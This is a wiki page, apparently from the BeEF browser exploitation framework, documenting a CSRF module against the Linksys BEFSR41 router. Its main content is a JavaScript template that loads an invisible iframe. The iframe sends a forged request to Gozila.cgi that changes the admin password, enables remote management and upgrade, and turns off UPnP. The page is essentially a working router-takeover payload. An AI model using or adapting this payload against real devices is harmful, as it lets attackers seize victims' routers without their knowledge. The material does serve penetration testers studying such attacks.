-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Linksys BEFSR41 CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: enable remote administration and change the password on a Linksys BEFSR41 router
-
Authors: Martin Barbella
-
Browsers: All
Uses an invisible iframe with GET request to change config
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK